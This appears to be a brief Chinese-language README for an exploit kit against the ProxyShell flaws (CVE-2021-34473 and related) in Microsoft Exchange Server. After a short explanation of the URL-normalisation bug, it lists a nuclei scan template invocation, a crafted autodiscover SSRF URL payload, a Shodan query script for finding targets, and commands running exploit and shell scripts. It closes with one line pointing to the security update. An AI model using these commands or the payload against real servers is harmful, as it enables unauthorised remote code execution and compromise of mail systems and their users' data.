CVE-2021-34473 Microsoft Exchange Server 远程代码执行漏洞。 这种错误的 URL 规范化机制允许我们以 Exchange Server 计算机账户身份访问任意后端 URL。尽管此漏洞的威力不如 ProxyLogon 中的 SSRF,并且我们只能操纵 URL 的路径部分,但它仍然足以让我们在任意后端访问的基础上实施进一步攻击。
用于 Proxyshell RCE(CVE-2021-34423、CVE-2021-34473、CVE-2021-31207)的 nuclei 扫描器,由 orange tsai 在 Pwn2Own 中发现,影响 Microsoft Exchange Server。
nuclei -u target.com -t proxyshell.yaml
https://xxx.xxx.xxx.xxx/autodiscover/[email protected]/mapi/nspi/?&Email=autodiscover/autodiscover.json%[email protected]
sudo python3 shodan-query.py
sudo python3 ProxyShell.py -u https://<IP>
python2 /manual/check.py
sudo python3 /manual/proxyshell.py
python2 /manual/shell.py
请应用此处的安全更新:CVE-2021-34473